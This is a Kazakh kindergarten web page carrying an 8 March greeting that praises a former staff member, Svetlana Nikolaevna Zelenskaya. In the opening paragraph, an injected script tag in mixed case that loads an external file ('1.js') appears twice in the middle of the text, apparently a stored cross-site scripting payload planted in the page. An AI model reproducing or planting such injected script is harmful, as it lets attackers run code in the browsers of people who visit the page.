Әйелді не құлпыртады? Әйелді әдемі етіп құлпыртатын нәрсе, тіпті алтында, гауhарда, байлықта емес! Әйелді ажарландыратын - ол әйел бойындағы қарапайымдылық пен әдептілік және еңбекқорлық.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.03.2024

Бойында дәл осы қасиеттердің бәрі бар адамның бірі, сұлу да, сымбатты Зеленская Светлана Николаевна. 

Біздің балабақшамызда жұмыс істеген жылдары Светлана Николаевна кастелланша қызметін атқарып, өзін адал, шығармашыл және өз жұмысына жауапкершілікпен қарайтын қызметкер ретінде көрсетті. Шаруашылық пен тазалық, еңбекқорлық, коммуникабельділік, жауапкершілігі мол Светлана Николаевнаның бойында  осы  қасиеттердің бәрі болды.

Светлана Николаевна, Сізді 8 Наурыз мерекесімен шын жүректен құттықтаймыз! Сіз  қазіргі таңда  демалыста болсаңыз да, сіз әлі де бұл әлемді өзіңіздің нәзік жүрегіңізбен мейірімге бөлеп, айналаңыздағы адамдардың жүрегін жарқын үмітпен және сүйіспеншілікке толтырып, жастарға әйел сұлулығының, құрмет пен салтанаттың нақты үлгісін қалдыра аладыңыз. Сізге қажымас қайрат, мінсіз сұлулық, ұзақ ғұмыр  тілейміз! Туыстарыңыз бен жақындарыңыздың сүйіспеншілігі,  толағай бақыт пен қуаныш сәулелері Сізді үнемі қоршай берсін!!!

Просмотров: 275

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу
Текст